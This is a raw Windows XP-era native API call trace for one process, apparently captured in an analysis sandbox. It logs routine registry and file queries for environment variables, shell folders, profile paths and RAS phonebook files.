 04299   712   NtQueryValueKey  (664,  (664, "ParseAutoexec", Partial, 144, ... TitleIdx=0, Type=1, Data="1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (664, "ParseAutoexec", Partial, 144, ... TitleIdx=0, Type=1, Data="1\0\0\0"}, 16, ) }, 16, ) == 0x0
 04300   712   NtClose  (664, ... ) == 0x0
 04301   712   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 04302   712   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 04303   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\c:\autoexec.bat"}, 24703624, ... ) }, 24703624, ... ) == 0x0
 04304   712   NtCreateFile  (0x80100080, {24, 0, 0x40, 0, 24703632,  (0x80100080, {24, 0, 0x40, 0, 24703632, "\??\c:\autoexec.bat"}, 0x0, 128, 1, 1, 96, 0, 0, ... 664, {status=0x0, info=1}, ) }, 0x0, 128, 1, 1, 96, 0, 0, ... 664, {status=0x0, info=1}, ) == 0x0
 04305   712   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 04306   712   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 04307   712   NtQueryInformationFile  (664, 24703648, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 04308   712   NtReadFile  (664, 0, 0, 0, 0, 0x0, 0, ... {status=0x0, info=0}, "", ) == 0x0
 04309   712   NtClose  (664, ... ) == 0x0
 04310   712   NtOpenKey  (0x20019, {24, 652, 0x40, 0, 0,  (0x20019, {24, 652, 0x40, 0, 0, "Environment"}, ... 664, ) }, ... 664, ) == 0x0
 04311   712   NtAllocateVirtualMemory  (-1, 1560576, 0, 12288, 4096, 4, ... 1560576, 12288, ) == 0x0
 04312   712   NtEnumerateValueKey  (664, 0, Full, 220, ... TitleIdx=0, Type=2, Name= (664, 0, Full, 220, ... TitleIdx=0, Type=2, Name="TEMP", Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0\0\0"}, 96, ) , Data= (664, 0, Full, 220, ... TitleIdx=0, Type=2, Name="TEMP", Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0\0\0"}, 96, ) }, 96, ) == 0x0
 04313   712   NtEnumerateValueKey  (664, 1, Full, 220, ... TitleIdx=0, Type=2, Name= (664, 1, Full, 220, ... TitleIdx=0, Type=2, Name="TMP", Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0\0\0"}, 96, ) , Data= (664, 1, Full, 220, ... TitleIdx=0, Type=2, Name="TMP", Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0\0\0"}, 96, ) }, 96, ) == 0x0
 04314   712   NtEnumerateValueKey  (664, 2, Full, 220, ... ) == STATUS_NO_MORE_ENTRIES
 04315   712   NtEnumerateValueKey  (664, 0, Full, 220, ... TitleIdx=0, Type=2, Name= (664, 0, Full, 220, ... TitleIdx=0, Type=2, Name="TEMP", Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0\0\0"}, 96, ) , Data= (664, 0, Full, 220, ... TitleIdx=0, Type=2, Name="TEMP", Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0\0\0"}, 96, ) }, 96, ) == 0x0
 04316   712   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 04317   712   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 04318   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\Temp"}, 24702364, ... ) }, 24702364, ... ) == 0x0
 04319   712   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 16417, ... 668, {status=0x0, info=1}, ) }, 3, 16417, ... 668, {status=0x0, info=1}, ) == 0x0
 04320   712   NtQueryDirectoryFile  (668, 0, 0, 0, 24701724, 616, BothDirectory, 1,  (668, 0, 0, 0, 24701724, 616, BothDirectory, 1, "Documents and Settings", 0, ... {status=0x0, info=138}, ) , 0, ... {status=0x0, info=138}, ) == 0x0
 04321   712   NtClose  (668, ... ) == 0x0
 04322   712   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\"}, 3, 16417, ... 668, {status=0x0, info=1}, ) }, 3, 16417, ... 668, {status=0x0, info=1}, ) == 0x0
 04323   712   NtQueryDirectoryFile  (668, 0, 0, 0, 24701724, 616, BothDirectory, 1,  (668, 0, 0, 0, 24701724, 616, BothDirectory, 1, "Local Settings", 0, ... {status=0x0, info=122}, ) , 0, ... {status=0x0, info=122}, ) == 0x0
 04324   712   NtClose  (668, ... ) == 0x0
 04325   712   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 04326   712   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 04327   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04328   712   NtEnumerateValueKey  (664, 1, Full, 220, ... TitleIdx=0, Type=2, Name= (664, 1, Full, 220, ... TitleIdx=0, Type=2, Name="TMP", Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0\0\0"}, 96, ) , Data= (664, 1, Full, 220, ... TitleIdx=0, Type=2, Name="TMP", Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0\0\0"}, 96, ) }, 96, ) == 0x0
 04329   712   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 04330   712   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 04331   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\Temp"}, 24702364, ... ) }, 24702364, ... ) == 0x0
 04332   712   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 16417, ... 668, {status=0x0, info=1}, ) }, 3, 16417, ... 668, {status=0x0, info=1}, ) == 0x0
 04333   712   NtQueryDirectoryFile  (668, 0, 0, 0, 24701724, 616, BothDirectory, 1,  (668, 0, 0, 0, 24701724, 616, BothDirectory, 1, "Documents and Settings", 0, ... {status=0x0, info=138}, ) , 0, ... {status=0x0, info=138}, ) == 0x0
 04334   712   NtClose  (668, ... ) == 0x0
 04335   712   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\"}, 3, 16417, ... 668, {status=0x0, info=1}, ) }, 3, 16417, ... 668, {status=0x0, info=1}, ) == 0x0
 04336   712   NtQueryDirectoryFile  (668, 0, 0, 0, 24701724, 616, BothDirectory, 1,  (668, 0, 0, 0, 24701724, 616, BothDirectory, 1, "Local Settings", 0, ... {status=0x0, info=122}, ) , 0, ... {status=0x0, info=122}, ) == 0x0
 04337   712   NtClose  (668, ... ) == 0x0
 04338   712   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 04339   712   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 04340   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04341   712   NtEnumerateValueKey  (664, 2, Full, 220, ... ) == STATUS_NO_MORE_ENTRIES
 04342   712   NtClose  (664, ... ) == 0x0
 04343   712   NtOpenKey  (0x20019, {24, 652, 0x40, 0, 0,  (0x20019, {24, 652, 0x40, 0, 0, "Volatile Environment"}, ... 664, ) }, ... 664, ) == 0x0
 04344   712   NtEnumerateValueKey  (664, 0, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 0, Full, 220, ... TitleIdx=0, Type=1, Name="LOGONSERVER", Data="\\0\\0M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 64, ) , Data= (664, 0, Full, 220, ... TitleIdx=0, Type=1, Name="LOGONSERVER", Data="\\0\\0M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 64, ) }, 64, ) == 0x0
 04345   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04346   712   NtEnumerateValueKey  (664, 1, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 1, Full, 220, ... TitleIdx=0, Type=1, Name="HOMEDRIVE", Data="C\0:\0\0\0"}, 46, ) , Data= (664, 1, Full, 220, ... TitleIdx=0, Type=1, Name="HOMEDRIVE", Data="C\0:\0\0\0"}, 46, ) }, 46, ) == 0x0
 04347   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04348   712   NtEnumerateValueKey  (664, 2, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 2, Full, 220, ... TitleIdx=0, Type=1, Name="HOMEPATH", Data="\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\0\0"}, 102, ) , Data= (664, 2, Full, 220, ... TitleIdx=0, Type=1, Name="HOMEPATH", Data="\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\0\0"}, 102, ) }, 102, ) == 0x0
 04349   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04350   712   NtEnumerateValueKey  (664, 3, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 3, Full, 220, ... TitleIdx=0, Type=1, Name="CLIENTNAME", Data="C\0o\0n\0s\0o\0l\0e\0\0\0"}, 56, ) , Data= (664, 3, Full, 220, ... TitleIdx=0, Type=1, Name="CLIENTNAME", Data="C\0o\0n\0s\0o\0l\0e\0\0\0"}, 56, ) }, 56, ) == 0x0
 04351   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04352   712   NtEnumerateValueKey  (664, 4, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 4, Full, 220, ... TitleIdx=0, Type=1, Name="SESSIONNAME", Data="C\0o\0n\0s\0o\0l\0e\0\0\0"}, 60, ) , Data= (664, 4, Full, 220, ... TitleIdx=0, Type=1, Name="SESSIONNAME", Data="C\0o\0n\0s\0o\0l\0e\0\0\0"}, 60, ) }, 60, ) == 0x0
 04353   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04354   712   NtEnumerateValueKey  (664, 5, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 5, Full, 220, ... TitleIdx=0, Type=1, Name="APPDATA", Data="C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\0\0"}, 140, ) , Data= (664, 5, Full, 220, ... TitleIdx=0, Type=1, Name="APPDATA", Data="C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\0\0"}, 140, ) }, 140, ) == 0x0
 04355   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04356   712   NtEnumerateValueKey  (664, 6, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 6, Full, 220, ... TitleIdx=0, Type=1, Name="HOMESHARE", Data="\0\0"}, 42, ) , Data= (664, 6, Full, 220, ... TitleIdx=0, Type=1, Name="HOMESHARE", Data="\0\0"}, 42, ) }, 42, ) == 0x0
 04357   712   NtEnumerateValueKey  (664, 7, Full, 220, ... ) == STATUS_NO_MORE_ENTRIES
 04358   712   NtEnumerateValueKey  (664, 0, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 0, Full, 220, ... TitleIdx=0, Type=1, Name="LOGONSERVER", Data="\\0\\0M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 64, ) , Data= (664, 0, Full, 220, ... TitleIdx=0, Type=1, Name="LOGONSERVER", Data="\\0\\0M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 64, ) }, 64, ) == 0x0
 04359   712   NtEnumerateValueKey  (664, 1, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 1, Full, 220, ... TitleIdx=0, Type=1, Name="HOMEDRIVE", Data="C\0:\0\0\0"}, 46, ) , Data= (664, 1, Full, 220, ... TitleIdx=0, Type=1, Name="HOMEDRIVE", Data="C\0:\0\0\0"}, 46, ) }, 46, ) == 0x0
 04360   712   NtEnumerateValueKey  (664, 2, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 2, Full, 220, ... TitleIdx=0, Type=1, Name="HOMEPATH", Data="\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\0\0"}, 102, ) , Data= (664, 2, Full, 220, ... TitleIdx=0, Type=1, Name="HOMEPATH", Data="\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\0\0"}, 102, ) }, 102, ) == 0x0
 04361   712   NtEnumerateValueKey  (664, 3, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 3, Full, 220, ... TitleIdx=0, Type=1, Name="CLIENTNAME", Data="C\0o\0n\0s\0o\0l\0e\0\0\0"}, 56, ) , Data= (664, 3, Full, 220, ... TitleIdx=0, Type=1, Name="CLIENTNAME", Data="C\0o\0n\0s\0o\0l\0e\0\0\0"}, 56, ) }, 56, ) == 0x0
 04362   712   NtEnumerateValueKey  (664, 4, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 4, Full, 220, ... TitleIdx=0, Type=1, Name="SESSIONNAME", Data="C\0o\0n\0s\0o\0l\0e\0\0\0"}, 60, ) , Data= (664, 4, Full, 220, ... TitleIdx=0, Type=1, Name="SESSIONNAME", Data="C\0o\0n\0s\0o\0l\0e\0\0\0"}, 60, ) }, 60, ) == 0x0
 04363   712   NtEnumerateValueKey  (664, 5, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 5, Full, 220, ... TitleIdx=0, Type=1, Name="APPDATA", Data="C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\0\0"}, 140, ) , Data= (664, 5, Full, 220, ... TitleIdx=0, Type=1, Name="APPDATA", Data="C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\0\0"}, 140, ) }, 140, ) == 0x0
 04364   712   NtEnumerateValueKey  (664, 6, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 6, Full, 220, ... TitleIdx=0, Type=1, Name="HOMESHARE", Data="\0\0"}, 42, ) , Data= (664, 6, Full, 220, ... TitleIdx=0, Type=1, Name="HOMESHARE", Data="\0\0"}, 42, ) }, 42, ) == 0x0
 04365   712   NtEnumerateValueKey  (664, 7, Full, 220, ... ) == STATUS_NO_MORE_ENTRIES
 04366   712   NtClose  (664, ... ) == 0x0
 04367   712   NtClose  (652, ... ) == 0x0
 04368   712   NtFreeVirtualMemory  (-1, (0x17a0000), 0, 32768, ... (0x17a0000), 4096, ) == 0x0
 04369   712   NtClose  (644, ... ) == 0x0
 04370   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\All Users\Application Data"}, 24704288, ... ) }, 24704288, ... ) == 0x0
 04371   712   NtCreateKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"}, 0, 0x0, 0, ... 644, 2, ) }, 0, 0x0, 0, ... 644, 2, ) == 0x0
 04372   712   NtSetValueKey  (644,  (644, "Common AppData", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0A\0l\0l\0 \0U\0s\0e\0r\0s\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\0\0", 106, ... ) , 0, 1,  (644, "Common AppData", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0A\0l\0l\0 \0U\0s\0e\0r\0s\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\0\0", 106, ... ) , 106, ... ) == 0x0
 04373   712   NtClose  (644, ... ) == 0x0
 04374   712   NtClose  (640, ... ) == 0x0
 04375   712   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\"}, 3, 16417, ... 640, {status=0x0, info=1}, ) }, 3, 16417, ... 640, {status=0x0, info=1}, ) == 0x0
 04376   712   NtQueryDirectoryFile  (640, 0, 0, 0, 24703264, 616, BothDirectory, 1,  (640, 0, 0, 0, 24703264, 616, BothDirectory, 1, "<.pbk", 0, ... ) , 0, ... ) == STATUS_NO_SUCH_FILE
 04377   712   NtClose  (640, ... ) == 0x0
 04378   712   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\Ras\"}, 3, 16417, ... 640, {status=0x0, info=1}, ) }, 3, 16417, ... 640, {status=0x0, info=1}, ) == 0x0
 04379   712   NtQueryDirectoryFile  (640, 0, 0, 0, 24703264, 616, BothDirectory, 1,  (640, 0, 0, 0, 24703264, 616, BothDirectory, 1, "<.pbk", 0, ... ) , 0, ... ) == STATUS_NO_SUCH_FILE
 04380   712   NtClose  (640, ... ) == 0x0
 04381   712   NtOpenThreadToken  (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN
 04382   712   NtOpenProcessToken  (-1, 0xc, ... 640, ) == 0x0
 04383   712   NtQueryInformationToken  (640, User, 64, ... {token info, class 1, size 36}, 36, ) == 0x0
 04384   712   NtOpenKey  (0x2001f, {24, 124, 0x40, 0, 0,  (0x2001f, {24, 124, 0x40, 0, 0, "S-1-5-21-1078081533-484763869-839522115-1003"}, ... 644, ) }, ... 644, ) == 0x0
 04385   712   NtCreateKey  (0x2000000, {24, 644, 0x40, 0, 0,  (0x2000000, {24, 644, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"}, 0, 0x0, 0, ... 652, 2, ) }, 0, 0x0, 0, ... 652, 2, ) == 0x0
 04386   712   NtClose  (644, ... ) == 0x0
 04387   712   NtQueryValueKey  (652,  (652, "AppData", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\0\0"}, 74, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (652, "AppData", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\0\0"}, 74, ) }, 74, ) == 0x0
 04388   712   NtAllocateVirtualMemory  (-1, 0, 0, 1, 4096, 4, ... 24772608, 4096, ) == 0x0
 04389   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04390   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04391   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\ProfileList"}, ... 644, ) }, ... 644, ) == 0x0
 04392   712   NtQueryValueKey  (644,  (644, "ProfilesDirectory", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0S\0y\0s\0t\0e\0m\0D\0r\0i\0v\0e\0%\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\0\0"}, 86, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (644, "ProfilesDirectory", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0S\0y\0s\0t\0e\0m\0D\0r\0i\0v\0e\0%\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\0\0"}, 86, ) }, 86, ) == 0x0
 04393   712   NtClose  (644, ... ) == 0x0
 04394   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\ProfileList"}, ... 644, ) }, ... 644, ) == 0x0
 04395   712   NtQueryValueKey  (644,  (644, "AllUsersProfile", Partial, 144, ... TitleIdx=0, Type=1, Data="A\0l\0l\0 \0U\0s\0e\0r\0s\0\0\0"}, 32, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (644, "AllUsersProfile", Partial, 144, ... TitleIdx=0, Type=1, Data="A\0l\0l\0 \0U\0s\0e\0r\0s\0\0\0"}, 32, ) }, 32, ) == 0x0
 04396   712   NtClose  (644, ... ) == 0x0
 04397   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04398   712   NtOpenKey  (0x1, {24, 48, 0x40, 0, 0,  (0x1, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Control\Session Manager\Environment"}, ... 644, ) }, ... 644, ) == 0x0
 04399   712   NtQueryKey  (644, Full, 176, ... {LastWrite={0x7838d13c,0x1c73999}, TitleIdx=0, Subkeys=0, Values=12, Class=""}, 44, ) == 0x0
 04400   712   NtQuerySecurityObject  (644, 7, 0, ... ) == STATUS_ACCESS_DENIED
 04401   712   NtEnumerateValueKey  (644, 0, Full, 220, ... TitleIdx=0, Type=2, Name= (644, 0, Full, 220, ... TitleIdx=0, Type=2, Name="ComSpec", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0\\0c\0m\0d\0.\0e\0x\0e\0\0\0"}, 96, ) , Data= (644, 0, Full, 220, ... TitleIdx=0, Type=2, Name="ComSpec", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0\\0c\0m\0d\0.\0e\0x\0e\0\0\0"}, 96, ) }, 96, ) == 0x0
 04402   712   NtEnumerateValueKey  (644, 1, Full, 220, ... TitleIdx=0, Type=2, Name= (644, 1, Full, 220, ... TitleIdx=0, Type=2, Name="Path", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0;\0%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0;\0%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0W\0b\0e\0m\0\0\0"}, 152, ) , Data= (644, 1, Full, 220, ... TitleIdx=0, Type=2, Name="Path", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0;\0%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0;\0%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0W\0b\0e\0m\0\0\0"}, 152, ) }, 152, ) == 0x0
 04403   712   NtEnumerateValueKey  (644, 2, Full, 220, ... TitleIdx=0, Type=2, Name= (644, 2, Full, 220, ... TitleIdx=0, Type=2, Name="windir", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\0\0"}, 58, ) , Data= (644, 2, Full, 220, ... TitleIdx=0, Type=2, Name="windir", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\0\0"}, 58, ) }, 58, ) == 0x0
 04404   712   NtEnumerateValueKey  (644, 3, Full, 220, ... TitleIdx=0, Type=1, Name= (644, 3, Full, 220, ... TitleIdx=0, Type=1, Name="OS", Data="W\0i\0n\0d\0o\0w\0s\0_\0N\0T\0\0\0"}, 46, ) , Data= (644, 3, Full, 220, ... TitleIdx=0, Type=1, Name="OS", Data="W\0i\0n\0d\0o\0w\0s\0_\0N\0T\0\0\0"}, 46, ) }, 46, ) == 0x0
 04405   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04406   712   NtEnumerateValueKey  (644, 4, Full, 220, ... TitleIdx=0, Type=1, Name= (644, 4, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_ARCHITECTURE", Data="x\08\06\0\0\0"}, 72, ) , Data= (644, 4, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_ARCHITECTURE", Data="x\08\06\0\0\0"}, 72, ) }, 72, ) == 0x0
